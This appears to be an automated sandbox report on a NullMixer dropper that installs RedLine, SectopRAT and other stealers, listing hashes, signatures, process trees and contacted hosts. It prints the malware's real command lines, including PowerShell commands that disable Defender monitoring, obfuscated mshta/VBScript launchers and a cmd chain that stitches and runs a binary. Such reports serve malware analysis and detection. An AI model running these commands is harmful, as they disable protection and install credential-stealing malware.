memory/1628-295-0x0000000000400000-0x0000000002F21000-memory.dmp
memory/1492-299-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2128-307-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/4360-313-0x0000000002610000-0x00000000027A5000-memory.dmp
memory/1628-314-0x0000000000400000-0x0000000002F21000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 76e3611edf4b31f9abcaeee6ba1a1d40 |
| SHA1 | a05b11a3b9a538b7d37969b570938039a3473eeb |
| SHA256 | 14a6f5b0923c7ea00435c32b401ec28dd96e04ff6f9f54dad2c701f82aac8c40 |
| SHA512 | dd856a4d5611918da3d68643fa29b2c02c35f7786f0f9da186f25fd03114512cf8b2dc2a3e5acbeb36b0f4dd0c8c2104a7d11ac5808d675211ea93803f2efd31 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | aa35e3b5f4527d618ff3c46679f55868 |
| SHA1 | 08ae42bf575c4f54ef073517224824b79fea50b8 |
| SHA256 | b714395304e2b34a4bc666b4120a4d4bcd02088b3bb487509627c12f3721a7d3 |
| SHA512 | 0094ba16db774fca48e4672b51d335aaade005a4ffcf627106c5681007bbec19333754842d02752ad99a701d4560093a94ccd0026360fb7d719f9666a769d247 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 84a1207237dcabc32e72ad576a198e97 |
| SHA1 | c31c974a53f3fe0cfe6c72991b8e4ea858b4acc1 |
| SHA256 | 8a2d1c5004fd1c81e4301d2f2e08ba6434b36acfd5bcaee6b2e9815bd66aa06a |
| SHA512 | 6289a326719877145cd0a03bfcebac7101c8c03a01fac6a9f7da7789ba7d9ee87676b512e5c5ec5adedd2c328dfd1a36d9eb782bd68fa7a279e554381848216a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c9541419438e206cac3a9f4d89b9e6d3 |
| SHA1 | 488af15898460b6778362946ddbb64a749b368e3 |
| SHA256 | ce27eb6ea20dc9539af717717d5babc41491242eea7e0d2804e086face386455 |
| SHA512 | db3df05a82874f1ff4c93f3687be1b3c425da69580944b456ecad6f52d623e9dfa1888ab5785f1c95ec1497c521443820aa1a07ea9d93551944778152053f473 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | ce95a660d17796b64dc224f7161df909 |
| SHA1 | aa58a02dc5772002e9703824485f07d97e4eaf79 |
| SHA256 | 8eb6a1fccc70ad03dc331cc95a316aad04737c80ef738f61706d86ffc33d77d6 |
| SHA512 | a4ab00c577217ff4f10b541a9af733f984a433c067bcb2b82cd313ec0770c09a4a62022bc77f2d68b7ef375ef33417091dd9d95dfef2706443479671156f1217 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5ae616abd0ae0bd1c0e6ad51a4cfc425 |
| SHA1 | 9d170c23b14641980aa9cbae52a509191d48ea76 |
| SHA256 | 6bf2c74bebe3c8a20b9e8d8e2d6b474b52fe1139213a56cccc1f4188022d1706 |
| SHA512 | 5ceeac530985a46e16a75188f7fc6da42ccedb379e4b6876527959f744a9438a3b03d0085c610ac3b651fd45dc2771638840f8f62e0d7864ea2e94babe4cabf2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d846968848f13cfcb79a9fd0671c8286 |
| SHA1 | 2e21dbc0436fecbcb6f2a4e5a7b7f942398e987a |
| SHA256 | cb4a2fb0ef24dcfde2ef9fbfe97e8102b1429b0534855910439d8460dfebdb43 |
| SHA512 | ac68e02a8bbf1fc60eb8ca8c43797425ee66e4a65921e5d3ffd631505892d0e446b5386e54899ffd107524a614ec8948e56be7e6cf44d2a292646f519068c8aa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f4f1d0a119b47dd0bc36490abb284178 |
| SHA1 | ba6717f6eaccdf70b41ea8751077f103da515c1d |
| SHA256 | b16ff6569369cbf777c789b1b98c1151a7cc062bdfaf55a5856dbead16ba9188 |
| SHA512 | d3ce93bc6b6bc804d74414e951c6139b968fd23e25505432f564446e1ee652272ace150e1e540ace377418c4b488792d7e6d05a4c9a9908772ae659433014b8f |
memory/4360-407-0x0000000002C60000-0x0000000002CF2000-memory.dmp
memory/4360-408-0x0000000002D00000-0x0000000003B18000-memory.dmp
memory/4360-409-0x0000000003B20000-0x0000000003BAB000-memory.dmp
memory/4360-410-0x0000000003BC0000-0x0000000003C47000-memory.dmp
memory/4360-413-0x0000000003BC0000-0x0000000003C47000-memory.dmp
memory/4360-414-0x00000000002A0000-0x00000000002A1000-memory.dmp
memory/4360-415-0x00000000002B0000-0x00000000002B4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d37ad49deab276c2897954fad0370cd8 |
| SHA1 | a09994f93020061b7017cd174a001359ae89b664 |
| SHA256 | c1866e38f077a37fbf00c04aa1c476cdc4c132389d4a34c0b9be59cf66a92313 |
| SHA512 | 0d4dc8410870ab1c44baf6ac518d0c5618d6f567ecefc38ed4b0b907a5ea365d96642dad8a0db934ba2093d4dad3eaeefe4392f49a70229192938631a3b00f8d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 563f4a8c0163a3a4403f13e58b40b468 |
| SHA1 | 84ee1ee27d2d0bd5734cc8837814bd3856b6b648 |
| SHA256 | 0c67b82c4815d1765c3060bc2794ce69fbf8905006cb5859da759a724160f3af |
| SHA512 | deb63061243a066a02c94aa6fc24b53fbff33868a498d70070b82340e27aa77a22e0faae68cab9c63420e6d3a1f01a3a0312a604e6d64cbf3942564df70b20f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 3831bf7ac62bc1e3b653f8f8ca5d1e4e |
| SHA1 | e3ca71f4560b8fb7d8c1b291eb3982365c4321b1 |
| SHA256 | 134450ab6468a0e4bf0584d7cf843ee9fbc53863f5778ba5f4aff81e029d3ba6 |
| SHA512 | 687727de76d0218c93d8304387de28c486613d882bc7d41a97b802690e257f8fc293523b1ac457631e136acd7754d3364405816acd3a56d48973b97d798021af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 72720449b4d999a1f47220fe8ac28129 |
| SHA1 | 83b1a464102474c779575b7c84d315a6d40bc911 |
| SHA256 | 9b929637db1cec44e4848c7e606026ef89f811288108003914dfafea1d2f0a9c |
| SHA512 | 070e4894ef2c065d2508e995ff85ccf15005aa5a698ceda8ab5a69b028471f8ebb33184ee878066e1552f45777ed490c644abc1aa8eb72b0a19797b8f7790341 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-22 07:31
Reported
2024-11-22 07:33
Platform
win7-20241010-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 988 set thread context of 1288 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe |
| PID 2988 set thread context of 2980 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe |
| PID 3060 set thread context of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe
Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe
Thu123e05ebe43921.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe
Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe
Thu122f7469b214cb59.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe
Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe
Thu12465fe68f85b6156.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe
Thu12ca1c119bc29.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe
Thu12b275ee70c7e913.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe
Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu120bfbc2443b3b5d.exe
Thu120bfbc2443b3b5d.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe
Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe
Thu124078ed79bdbd5.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe
Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe
Thu1231d30cda84872.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp" /SL5="$301C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 484
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe
"C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp" /SL5="$9018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
yDhNY.exe /pFKkSWJQc5v2ppVFMo
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "Thu12493eba7a.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\ISA502G.S7
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
